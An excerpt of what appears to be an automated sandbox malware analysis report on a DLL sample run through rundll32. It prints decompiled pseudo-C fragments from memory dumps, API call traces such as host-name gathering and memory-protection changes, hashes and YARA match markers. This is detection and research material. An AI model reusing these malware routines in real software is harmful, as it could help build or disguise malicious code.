                                          			E048969D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04891000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x489a348; // 0x9ad5a8
						_t20 = _t68 + 0x489b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04892898(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x048969d8
                                          0x048969db
                                          0x048969eb
                                          0x048969f4
                                          0x048969f8
                                          0x04896ac6
                                          0x04896acc
                                          0x04896acc
                                          0x04896a12
                                          0x04896a17
                                          0x04896a1b
                                          0x04896a21
                                          0x04896a26
                                          0x04896a2d
                                          0x04896a3c
                                          0x04896a3c
                                          0x04896a40
                                          0x04896a42
                                          0x04896a4e
                                          0x04896a59
                                          0x04896a64
                                          0x04896a68
                                          0x04896a72
                                          0x04896a76
                                          0x04896a78
                                          0x04896a7d
                                          0x04896a84
                                          0x04896a94
                                          0x04896a94
                                          0x04896a7d
                                          0x04896a76
                                          0x04896a96
                                          0x04896a9b
                                          0x04896aa0
                                          0x04896aa0
                                          0x04896aa3
                                          0x04896aac
                                          0x04896ab1
                                          0x04896ab1
                                          0x04896ab6
                                          0x04896abb
                                          0x04896abb
                                          0x04896ab6
                                          0x04896a40
                                          0x04896abd
                                          0x04896ac3
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04891000: SysAllocString.OLEAUT32(80000002), ref: 0489105D
                                            • Part of subcall function 04891000: SysFreeString.OLEAUT32(00000000), ref: 048910C3
                                          • SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SysFreeString.OLEAUT32(04896ECE), ref: 04896ABB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 28cd1ef51bf25f0e93d98f256b5c83a49fd19ec374efa563293856535c7120e5
                                          • Instruction ID: 2cc46c82d856a0f986a4c0e13a01c1bf9016c1a6197f16d84690f81332dc2aaf
                                          • Opcode Fuzzy Hash: 28cd1ef51bf25f0e93d98f256b5c83a49fd19ec374efa563293856535c7120e5
                                          • Instruction Fuzzy Hash: 6F311C71500515AFCF11DF68C988C9BBBF9FFC97407188A58F815EB210E671ADA1CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896615 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E04896615(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x489a348; // 0x9ad5a8
				_t2 = _t42 + 0x489b470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x489a348; // 0x9ad5a8
					_t6 = _t45 + 0x489b490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x489a348; // 0x9ad5a8
							_t30 = _v8;
							_t12 = _t48 + 0x489b480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                          0x04896621
                                          0x04896622
                                          0x04896628
                                          0x0489662f
                                          0x04896631
                                          0x04896635
                                          0x04896639
                                          0x0489663b
                                          0x04896644
                                          0x0489664a
                                          0x04896652
                                          0x04896654
                                          0x04896658
                                          0x0489665a
                                          0x04896667
                                          0x0489666b
                                          0x04896670
                                          0x04896676
                                          0x0489667b
                                          0x04896683
                                          0x04896685
                                          0x04896687
                                          0x0489668d
                                          0x0489668d
                                          0x04896690
                                          0x04896696
                                          0x04896696
                                          0x04896699
                                          0x0489669f
                                          0x0489669f
                                          0x048966a6

                                          APIs
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04896652
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04896683
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Interface_ProxyQueryUnknown_
                                          • String ID:
                                          • API String ID: 2522245112-0
                                          • Opcode ID: e30c42d754b098e50ac3d9d7383325e53738df6fa0eb8628ad7c466284688b3a
                                          • Instruction ID: 56dade4458782443f4be198f8a62954aef2cbd4bdb226849bd503e55816386be
                                          • Opcode Fuzzy Hash: e30c42d754b098e50ac3d9d7383325e53738df6fa0eb8628ad7c466284688b3a
                                          • Instruction Fuzzy Hash: 652103B5A00619EFCB00DBA8C444D5AB7B9FFC9B14B188A88E905EB314D671FD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B71BBA Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000,?), ref: 00B71BEA
                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000), ref: 00B71C31
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                          • String ID:
                                          • API String ID: 552344955-0
                                          • Opcode ID: 742d3658404c407b9cbfa84870f14d0cb2ee0e5158530858850e7e74dd903051
                                          • Instruction ID: d3fa3ca78ee141d7111adc00c072efec1b56502e29560db7da24a8d63ea4c5cd
                                          • Opcode Fuzzy Hash: 742d3658404c407b9cbfa84870f14d0cb2ee0e5158530858850e7e74dd903051
                                          • Instruction Fuzzy Hash: 81118671940208ABD7129BECC844BDEBBF9EF80755F2084D9E814AB200DB75DE45DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B67C1E Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00B63344,69B25F44,?,?,00000000), ref: 00B67C5B
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00B63344), ref: 00B67CBC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileFreeHeapSystem
                                          • String ID:
                                          • API String ID: 892271797-0
                                          • Opcode ID: 97a7f089c4336274774bec878589a609726a6e414a04d9e2f7731bf64afd5fc1
                                          • Instruction ID: 9255758eaa5ab6b7cb1a1dbecf54f8e243e1972c0118f5af349872a55f0a844f
                                          • Opcode Fuzzy Hash: 97a7f089c4336274774bec878589a609726a6e414a04d9e2f7731bf64afd5fc1
                                          • Instruction Fuzzy Hash: 2711E6B6900209EBDF01DBA4D949ADE77FCEB08305F100592A905E3150DF389A848B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048928E4 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 0489290B
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SafeArrayDestroy.OLEAUT32(?), ref: 0489295B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ArraySafe$CreateDestroyFreeString
                                          • String ID:
                                          • API String ID: 3098518882-0
                                          • Opcode ID: 8b766d6c8d93a4d5b1d0e3cce22d54d1471f98dced8f81178471873b8841aaca
                                          • Instruction ID: 96ee5c327cc745f1d83588a81fb6b6ab789c214bf50ba5963e08a7450cf6462d
                                          • Opcode Fuzzy Hash: 8b766d6c8d93a4d5b1d0e3cce22d54d1471f98dced8f81178471873b8841aaca
                                          • Instruction Fuzzy Hash: 68113071A00609BFDF01DFA8D804EEEB7B9EF08750F048555FA04E7160E674AE159B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048978E7 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(0489744C), ref: 04897900
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SysFreeString.OLEAUT32(00000000), ref: 04897941
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: c64f1a6832d58023791b963bbab1e7d7856710e46c4625a362cd653f53d97727
                                          • Instruction ID: 221d71f7c81d3165fba708329d4ccbbbf70219deea641c448274c8414ea85133
                                          • Opcode Fuzzy Hash: c64f1a6832d58023791b963bbab1e7d7856710e46c4625a362cd653f53d97727
                                          • Instruction Fuzzy Hash: 1C014F7551061ABFDF019FA9D804D9F7BB8EF48610B044526F908E6120E6349D15DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04891567 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04891567(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04894DF6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04894C73(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x0489156c
                                          0x04891577
                                          0x04891579
                                          0x0489157f
                                          0x04891581
                                          0x04891586
                                          0x0489158f
                                          0x04891593
                                          0x0489159c
                                          0x048915a0
                                          0x048915af
                                          0x048915a2
                                          0x048915a3
                                          0x048915a8
                                          0x048915a8
                                          0x048915a0
                                          0x04891593
                                          0x048915b8

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,0489641B), ref: 0489157F
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,0489641B), ref: 0489159C
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 74f48d5ac0103123ed83e442e6a58e64e44b188588d1112366fd27328860056b
                                          • Instruction ID: 988c0dfe8e512aede09f20535ce8c662dd8219d6da911c7c7fe017c39bc46104
                                          • Opcode Fuzzy Hash: 74f48d5ac0103123ed83e442e6a58e64e44b188588d1112366fd27328860056b
                                          • Instruction Fuzzy Hash: 61F09626744506BBFF50DA998D04E9B26ECDBC1744F190655A901D3100EA70EE018661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048975C6 Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048975C6(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E04894DF6(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x489a348; // 0x9ad5a8
					_t5 = _t11 + 0x489ba48; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x489a348; // 0x9ad5a8
					_t6 = _t14 + 0x489b8f8; // 0x6d0063
					_t16 = E04893E6C(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E04894C73(_t20);
				}
				return _t18;
			}









                                          0x048975dc
                                          0x048975e0
                                          0x04897620
                                          0x048975e2
                                          0x048975e6
                                          0x048975ed
                                          0x048975f5
                                          0x048975fb
                                          0x04897606
                                          0x0489760f
                                          0x04897615
                                          0x04897617
                                          0x04897617
                                          0x04897625

                                          APIs
                                          • lstrlenW.KERNEL32(76DDF710,00000000,?,04892AC0,00000000,?,76DDF710,00000000,76DDF730), ref: 048975CC
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • wsprintfW.USER32 ref: 048975F5
                                            • Part of subcall function 04893E6C: memset.NTDLL ref: 04893E8F
                                            • Part of subcall function 04893E6C: GetLastError.KERNEL32 ref: 04893EDB
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                          • String ID:
                                          • API String ID: 1672627171-0
                                          • Opcode ID: f47238913afe98c22002bc493c57a99b1dc8ec7526c14e4473b79cd0bcaa8ea5
                                          • Instruction ID: 0612eab776ef16ce0bc81461f14fb3594da59341dd7e81fb240a1581b352e925
                                          • Opcode Fuzzy Hash: f47238913afe98c22002bc493c57a99b1dc8ec7526c14e4473b79cd0bcaa8ea5
                                          • Instruction Fuzzy Hash: 7FF09076601E14ABDA11A75CEC04E9B37DDEB84B24F0D4E12F500D7111DA74ED428765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B59A58 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B59A62
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B59A9E
                                            • Part of subcall function 00B6E376: lstrlen.KERNEL32(?,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3C4
                                            • Part of subcall function 00B6E376: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3D6
                                            • Part of subcall function 00B6E376: lstrcpy.KERNEL32(00000000,?), ref: 00B6E3E5
                                            • Part of subcall function 00B6E376: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3F6
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 1872894792-0
                                          • Opcode ID: 36df150891ddb4fdf2cdadadcede8c3d414c5097d75a202c95741bd2f4dde17a
                                          • Instruction ID: 39cc9c73f7cb47b5070779d47d16c1608e6392234800bd69b2e97060fbac9008
                                          • Opcode Fuzzy Hash: 36df150891ddb4fdf2cdadadcede8c3d414c5097d75a202c95741bd2f4dde17a
                                          • Instruction Fuzzy Hash: D1F06C766412159F87306F589D85875FBE8FB8931631581DAED1953321CB615C41C6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F936 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedIncrement.KERNEL32(00B7907C), ref: 00B6F94B
                                            • Part of subcall function 00B65CA1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B65CCC
                                            • Part of subcall function 00B65CA1: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00B65CD9
                                            • Part of subcall function 00B65CA1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B65D65
                                            • Part of subcall function 00B65CA1: GetModuleHandleA.KERNEL32(00000000), ref: 00B65D70
                                            • Part of subcall function 00B65CA1: RtlImageNtHeader.NTDLL(00000000), ref: 00B65D79
                                            • Part of subcall function 00B65CA1: RtlExitUserThread.NTDLL(00000000), ref: 00B65D8E
                                          • InterlockedDecrement.KERNEL32(00B7907C), ref: 00B6F96F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                          • String ID:
                                          • API String ID: 1011034841-0
                                          • Opcode ID: 95fa07fd034d5ad9a67866157d7ab9d8d49ebf46dc981f2e7e288922697872d0
                                          • Instruction ID: c2315497a3d91deebc47cd7a32c98f3e3b33f37ee01092364530e0d1e5b1d218
                                          • Opcode Fuzzy Hash: 95fa07fd034d5ad9a67866157d7ab9d8d49ebf46dc981f2e7e288922697872d0
                                          • Instruction Fuzzy Hash: C7E01A31284336F7DF216BF4BD04BBAA6D2EB14B61F4044B4F59AD10E0C728CC50C6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893D23 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04893D23(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x489a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x489a1c8 = GetTickCount();
				_t5 = E0489515F(_a4);
				if(_t5 == 0) {
					_t5 = E048939B5(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E04896729(_t9) != 0) {
							 *0x489a300 = 1; // executed
						}
						_t7 = E04892C52(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                                          0x04893d23
                                          0x04893d2c
                                          0x04893d32
                                          0x04893d39
                                          0x04893d3d
                                          0x00000000
                                          0x04893d3d
                                          0x04893d4a
                                          0x04893d4f
                                          0x04893d56
                                          0x04893d5c
                                          0x04893d63
                                          0x04893d6c
                                          0x04893d6e
                                          0x04893d6e
                                          0x04893d78
                                          0x00000000
                                          0x04893d78
                                          0x04893d63
                                          0x04893d7d

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04893DA8,?), ref: 04893D2C
                                          • GetTickCount.KERNEL32 ref: 04893D40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapTick
                                          • String ID:
                                          • API String ID: 2177101570-0
                                          • Opcode ID: a66b99f4d30ec611c665c83403b7c09360a511cf377fd6108492e7b75f240b31
                                          • Instruction ID: 32da25917dce33caf10d833b7ca4bbd9a784d39c9f566cb702daa726f0889573
                                          • Opcode Fuzzy Hash: a66b99f4d30ec611c665c83403b7c09360a511cf377fd6108492e7b75f240b31
                                          • Instruction Fuzzy Hash: 28F0EDB0244F02BEEF212F759D55B197AE4AF08748F1C4E29ED47D4190EFB5EC009626
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B647AE Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B63D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63DC1
                                            • Part of subcall function 00B63D88: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B63DF7
                                            • Part of subcall function 00B63D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63E03
                                            • Part of subcall function 00B63D88: lstrcmpi.KERNEL32(?,00000000), ref: 00B63E40
                                            • Part of subcall function 00B63D88: StrChrA.SHLWAPI(?,0000002E), ref: 00B63E49
                                            • Part of subcall function 00B63D88: lstrcmpi.KERNEL32(?,00000000), ref: 00B63E5B
                                            • Part of subcall function 00B63D88: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B63EAC
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0), ref: 00B647ED
                                            • Part of subcall function 00B51C78: GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                            • Part of subcall function 00B51C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0,?,00000318), ref: 00B64878
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                          • String ID:
                                          • API String ID: 4138075514-0
                                          • Opcode ID: 190e93ad82cc102f02d5f17c2ca2855e5109ad20d880399256e4633e6b5c4f4e
                                          • Instruction ID: aa475cc62ffd0666d3144b4b380f11ad64762b4cb4e56be04e911e5a5373e789
                                          • Opcode Fuzzy Hash: 190e93ad82cc102f02d5f17c2ca2855e5109ad20d880399256e4633e6b5c4f4e
                                          • Instruction Fuzzy Hash: 0121D371D01228ABCF519FA5DC84ADEBBB4FF48B20F10816AF918B6150C7345A45DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6CB50 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000001,00000000,76D84D40,?,?,00000000,00B63333,?,?,?,?,?,?,?,00B5BF69), ref: 00B6CB65
                                          Memory Dump Source
